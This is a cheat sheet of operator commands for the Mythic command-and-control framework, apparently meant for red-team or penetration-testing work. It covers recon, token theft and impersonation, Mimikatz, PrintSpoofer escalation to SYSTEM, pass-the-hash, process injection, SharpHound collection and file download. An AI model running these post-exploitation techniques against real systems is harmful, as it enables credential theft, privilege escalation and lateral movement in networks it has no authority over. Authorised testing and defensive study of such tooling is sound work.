
Mythic

Beacon Management (Real-Time C2 Control)

# Set the sleep interval and jitter to 0 so the agent checks in continuously (no sleep)
Mythic > sleep 0 0

# Instruct agent to exit
Mythic > exit

# List all running jobs
Mythic > jobs

# Kill a specific job
Mythic > jobkill [jid]

# Load additional commands into agent
Mythic > load command1 command2 ...

# Link to a peer-to-peer (SMB/TCP) agent
Mythic > link

# Unlink a linked agent
Mythic > unlink

Information Gathering / Recon

# List network interfaces and IP addresses
Mythic > ifconfig

# List running processes
Mythic > ps

# List directory contents
Mythic > ls -Path [path]

# Print current working directory
Mythic > pwd

# Display domain controllers
Mythic > net_dclist [domain.local]

# List shares on a remote machine
Mythic > net_shares -Computer [hostname]

# Show local groups on a machine
Mythic > net_localgroup [hostname]

# Show members of a local group
Mythic > net_localgroup_member -Group [groupname] -Computer [hostname]

# View network connections
Mythic > netstat -Tcp -Udp

# Take a screenshot
Mythic > screenshot

Privilege Escalation

# Attempt to enable the privileges already present on the current token (does not grant new ones)
Mythic > getprivs

# Run a Mimikatz command through the agent (here: request the debug privilege)
Mythic > mimikatz -Command "privilege::debug"

# Steal token from a PID
Mythic > steal_token [pid]

# Create a token from a user's plaintext credentials and impersonate it
Mythic > make_token -username [user] -password [pass]

# PrintSpoofer to escalate to SYSTEM
Mythic > printspoofer -Command "cmd.exe"

# Revert to original token
Mythic > rev2self

Lateral Movement

# Use Pass-the-Hash to run commands
Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe]

# Copy file to remote system
Mythic > cp -Path [source] -Destination [dest]

# Query services on a host (the sc command can also manipulate them)
Mythic > sc -Query -Computer [host]

# Use PowerShell remoting (if applicable)
Mythic > powershell -Command "Invoke-Command ..."

Post-Exploitation / Execution

# Run shell command
Mythic > shell whoami

# Run PowerShell in current process
Mythic > powershell -Command "Get-Process"

# Import PowerShell script
Mythic > powershell_import

# Inject PowerShell into a specific process
Mythic > psinject -PID [pid] -Command "..."

# Execute .NET assembly
Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical"

# Register .NET assembly
Mythic > register_assembly

# Execute inline .NET assembly
Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..."

# Execute unmanaged PE
Mythic > execute_pe -PE [binary.exe] -Arguments "..."

# Execute Beacon Object File (BOF)
Mythic > execute_coff -Coff [file.o] -Function [go]

File Transfer

# Upload a file
Mythic > upload

# Download a file
Mythic > download -Path [path]

# Remove a file
Mythic > rm -Path [path]
